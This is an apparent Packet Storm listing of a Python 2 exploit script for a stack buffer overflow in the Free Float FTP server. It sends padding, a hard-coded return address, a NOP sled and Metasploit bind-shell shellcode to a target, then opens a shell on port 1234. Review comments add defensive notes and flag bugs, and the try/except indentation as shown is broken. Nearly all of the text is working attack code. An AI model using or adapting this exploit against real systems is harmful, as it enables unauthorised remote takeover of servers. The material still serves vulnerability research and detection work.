Free Float FTP Server Buffer Overflow

2011-08-20T00:00:00
ID PACKETSTORM:104270
Type packetstorm
Reporter Debasish Mandal
Modified 2011-08-20T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#Free Float FTP server Response stack Buffer Overflow Exploit
#Tested on: Windows Xp SP2.
#Author Debasish Mandal
#URL:http://www.facebook.com/raza.whitehat
#
# NOTE(review): 2011-era proof of concept written for Python 2 (print
# statements, raw_input); it does not run unmodified under Python 3, and
# the indentation inside the try/except below was lost in extraction.
# What the script does is send one oversized FTP command line (several
# hundred bytes: "A" padding, a fixed address, a 0x90 NOP sled, an opaque
# payload blob). From a defender's side, a request of that shape is what a
# network IDS or the FTP server's own logging would record; the mitigation
# is to patch or retire the server and run it on a platform with DEP/ASLR,
# which the hard-coded address below does not account for.


import socket,sys
from struct import pack

# Fixed layout: 251 bytes of padding, then the 4-byte address, then the
# NOP sled and payload. The offset is specific to the build the author
# tested and is not derived at runtime.
buff = "A"* 251
junk = "A"*5
nop = "\x90"*20
# Hard-coded address, little-endian. Only meaningful on the stated test
# platform (Windows XP SP2); on a system with randomised module bases this
# constant is not valid.
eip = pack('<L',0x77F5801C)

#Shell code generated by Metasploit framework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS are "\x00","\x0a" & "\x0d".
# Opaque encoded payload; treated as a blob here and not analysed.
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the targer port (Default 21): ")
# NOTE(review): the prompt promises a default, but none is applied -- an
# empty PORT makes int(PORT) below raise ValueError, which the bare except
# then reports as "didn't respond".
print "[*] Connecting to the host "+HOST+" on port "+PORT
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# socket.connect() returns None, so 'connect' is never used.
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
except:
# Bare except: every failure (name resolution, refused connection, bad
# port string, even KeyboardInterrupt) is hidden behind one message.
print "[*] FTP Server didn't respond\n"
sys.exit(0)
# Reads the server greeting; the data itself is never inspected.
data=s.recv(1024)
print "[*]Sending PAYLOAD to the target server"
# The entire buffer is sent as a single CRLF-terminated command line.
s.send(buff+'\r\n')
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"
# The socket is never closed; the script simply falls off the end.
`